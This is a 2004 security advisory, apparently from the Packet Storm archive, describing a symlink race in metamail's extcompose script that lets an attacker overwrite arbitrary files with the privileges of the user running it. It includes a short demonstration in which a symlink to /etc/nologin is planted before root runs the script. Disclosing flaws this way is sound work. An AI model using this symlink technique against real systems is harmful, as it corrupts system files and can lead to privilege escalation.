exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

extcompose.txt

extcompose.txt
Posted Mar 13, 2004
Authored by Shaun Colley | Site nettwerked.co.uk

Extcompose, a function of the metamail package, fails to properly verify a file exists prior to writing to it, and will accept symbolic links, leaving it open to being an attack vector.

tags | advisory
SHA-256 | ecb0d56a71d017b5a7e9ee58f1fd7f55abb82c34705174f94c74945fd4205bde

extcompose.txt

Change Mirror Download
~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*

Product: Extcompose included with the common
metamail package.
http://bmrc.berkeley.edu/~trey/emacs/metamail.html

Versions: All
Bug: Symlink bug / race condition
Impact: Attacker's can write to arbitrary files,
and in theory, elevate privileges
Date: March 11, 2004
Author: Shaun Colley
Email: shaunige@yahoo.co.uk
WWW: http://www.nettwerked.co.uk

~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*~*



Introduction
#############

With the popular 'metamail' package (included in most
popular Linux distributions), there is a script
included called 'extcompose' (usually located at
/usr/bin/extcompose and /usr/bin/extcompose.sigh).

A symlink vulnerability exists in the extcompose
script, which can allow an attacker to overwrite/write
to arbitrary files with the privileges of the invoking
user, due to the fact that Extcompose does not check
that the output filename is not a symlink.

Due to the popularity of metamail, extcompose is
present on a large percentage of Linux systems.

"The extcompose program will allow a user on a
properly-equipped work-station to enter the
appropriate data to enable a mail message he is
sending to make reference to "external" data, that is,
data that is not included in the mail message itself
but is otherwise available on the network via a
suitable mechanism." - From the extcompose(1) man
page.



The bug
########

The vulnerability presents itself when extcompose
takes user-data, and writes the relevent output to the
file specified by the user on the command-line. The
extcompose script, unfortunately, does not check for
existance of the output file specified, nor does it
check for the possibility of the filename specified
being a symlink - it just *blindly* writes its output
to the file with a bunch of "echo [data] >> file"
commands.

If an attacker creates a symlink with the name of the
file specified by the invoking user of the script,
arbitrary files can be corrupted/overwritten with the
privileges of the invoking user, and in theory,
privileges could possibly be elevated.

For example, if extcompose was ran by root, and an
attacker creates a symlink to /etc/nologin, or worse
yet, results could be quite severe. An example attack
is demonstrated below.

Due to the fact that an attacker must know the
filename specified by the invoking user of extcompose
in order to create the symlink, this could be
considered a race condition (i.e the attacker might
see the unsuspecting user typing the command in an
office environment, and quickly create the symlink
using her terminal).


The exploit
############

An example exploit scenario is demonstrated below:


##
kid$ ln -s /etc/nologin /directory/mailfile

[...]

root# /usr/bin/extcompose /directory/mailfile

Where is the external data that you want this mail
message to reference?
1 -- In a local file
2 -- In an AFS file
3 -- In an anonymous FTP directory on the Internet
4 -- In an Internet FTP directory that requires a
valid login
5 -- Under the control of a mail server that will
send the data on request

Please enter a number from 1 to 5: 1

Enter the full path name for the file:
/home/shaun/outlooksploit.html
Please enter the MIME content-type for the externally
referenced data: text/plain

Is this data already encoded for email transport?
1 -- No, it is not encoded
2 -- Yes, it is encoded in base64
3 -- Yes, it is encoded in quoted-printable
4 -- Yes, it is encoded using uuencode
2

[...mailfile is written with generated MIME data...]

[...]

attack$ cat /etc/nologin
Content-type: message/external-body;
access-type=local-file;
name="/home/shaun/outlooksploit.html"

Content-type: text/plain
Content-transfer-encoding: base64
###


As demonstrated, extcompose does not safely deal with
file handling, thus presenting possibility of
exploitation to overwrite/corrupt arbitrary files with
the privileges of the user running 'extcompose'. In
theory, this could lead to escalation of privileges.


#####
NOTE:
#####

The script '/usr/bin/extcompose.sigh', which is almost
identical, is also vulnerable.



The fix
########

No fix exists. I have attempted to contacted the
author of metamail ('extcompose' is part of the
metamail package), but metamail is no longer
maintained, although it is still packaged in many
Linux distributions.


Workaround: Run 'extcompose' with a low privileged
account.



Credit
#######

Vulnerability discovered by shaun2k2 / Shaun Colley.




Thank you for your time.
Shaun.





___________________________________________________________
Yahoo! Messenger - Communicate instantly..."Ping"
your friends today! Download Messenger Now
http://uk.messenger.yahoo.com/download/index.html
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close